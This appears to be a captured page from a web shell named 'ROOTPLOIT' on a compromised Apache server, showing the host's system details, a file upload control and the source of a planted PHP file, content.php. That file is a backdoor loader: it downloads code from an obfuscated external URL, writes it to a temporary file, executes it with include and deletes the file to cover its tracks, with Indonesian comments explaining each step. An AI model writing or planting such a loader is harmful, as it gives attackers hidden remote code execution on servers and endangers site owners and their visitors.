ROOTPLOIT
Server: Apache
System: Linux node6122.myfcloud.com 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User: bashacomputer (1004)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/bashacomputer/public_html/tekata/DKR/content.php
<?php
$url = "https://51"."la.icw7.xyz/a"."2.txt";  // Ganti dengan URL yang diinginkan

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);

if ($result === false) {
    echo "Error: " . "PD9waHA=" . curl_error($ch);
} else {
    // Simpan hasil dari URL ke dalam file lokal
    $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
    file_put_contents($tempFile, $result);

    // Include file yang telah diunduh dari URL
    include $tempFile;

    // Hapus file sementara setelah dieksekusi
    unlink($tempFile);
}
curl_close($ch);